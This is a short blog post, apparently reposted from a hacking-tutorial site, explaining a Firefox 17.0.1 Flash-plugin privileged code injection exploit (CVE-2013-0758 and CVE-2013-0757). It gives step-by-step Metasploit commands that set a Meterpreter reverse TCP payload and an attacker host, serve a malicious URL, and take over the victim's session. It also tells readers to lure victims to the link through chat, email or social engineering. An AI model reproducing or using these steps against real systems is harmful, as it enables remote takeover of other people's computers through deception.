This
exploit gains remote code execution on Firefox 17.0.1 and all previous
versions provided the user has installed Flash. No memory corruption is
used. First, a Flash object is cloned into the anonymous content of the
SVG “use” element in the <body> (CVE-2013-0758). From there, the
Flash object can navigate a child frame to a URL in the chrome://
scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the
security wrapper around the child frame’s window reference and inject
code into the chrome:// context. Once we have injection into the chrome
execution context, we can write the payload to disk, chmod it (if
posix), and then execute. Note: Flash is used here to trigger the
exploit but any Firefox plugin with script access should be able to
trigger it.
Exploit Targets
Firefox 17.0.1
Windows PC
Linux PC
MAC OS X PC
Requirement
Attacker: Backtrack 5
Victim PC: Windows 7
Open backtrack terminal type msfconsole
msf exploit (firefox_svg_plugin)>set payload windows/meterpreter/reverse_tcp
msf exploit (firefox_svg_plugin)>set lhost 192.168.1.167 (IP of Local Host)
msf exploit (firefox_svg_plugin)>set srvhost 192.168.1.167 (This must be an address on the local machine)
msf exploit (firefox_svg_plugin)>set uripath / (The Url to use for this exploit)
msf exploit (firefox_svg_plugin)>exploit
Now an URL you should give to your victim http://192.168.1.167:8080/
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
Fuente: http://www.hackingarticles.in/hack-windows-linux-or-mac-pc-using-firefox-17-0-1-flash-privileged-code-injection/
No hay comentarios:
Publicar un comentario